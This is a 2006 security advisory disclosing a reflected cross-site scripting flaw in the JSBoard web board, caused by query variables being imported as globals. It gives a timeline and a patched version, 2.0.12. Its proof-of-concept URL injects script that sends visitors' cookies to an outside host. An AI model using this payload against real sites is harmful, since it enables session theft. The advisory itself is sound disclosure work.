JSBoard XSS vulnerability

2006-05-02T00:00:00
ID SECURITYVULNS:DOC:12514
Type securityvulns
Reporter Securityvulns
Modified 2006-05-02T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

============================================ ||| Security Advisory AKLINK-SA-2006-001 ||| ||| CAN-2006-2109 (CVE candidate) ||| ============================================

JSBoard - Cross Site Scripting Attack

Date released: 02.05.2006 Date reported: 30.04.2006 $Revision: 1.1 $

by Alexander Klink alexander@klink.name https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt (TLS certificate information: https://www.klink.name/tls.txt) http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109

Vendor: JoungKyun Kim (Open Source) Product: JSBoard - a news and discussion web board popular in Korea Website: http://jsboard.kldp.org Vulnerability: Non-persistent XSS attack Class: remote Status: patched Severity: low (possible disclosure of session and other cookies) Releases known to be affected: 2.0.11, 2.0.10 Releases known NOT to be affected: 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Overview:

A non-persistent XSS attack can be carried out using variables that are supposed to be from included files but can be overwritten using variables defined in the CGI query.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Technical details:

In the function parse_query_str() in include/print.php every variable from the CGI request is set as a global variable, regardless of prior use. As parse_query_str() is typically called after the inclusion of other files that define variables which are not changed but output in the rest of the program, this allows an attacker to inject XSS code, for example Javascript.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Proof of concept:

http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Workaround:

None known.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Communication:

  • 30.04.2006: Problem reported to author
  • 30.04.2006: Author replies and releases patched version 2.0.12

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Solution:

Install JSBoard 2.0.12, which fixes this particular attack vector. Note that CGI query variables are still imported into the global namespace, which means a similar problem might appear in a later version. The patch is available from: http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Credit:

Alexander Klink (discovery)

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv Z7Jztkr1x7zn/uOaHy+rTSs= =k/y4 -----END PGP SIGNATURE-----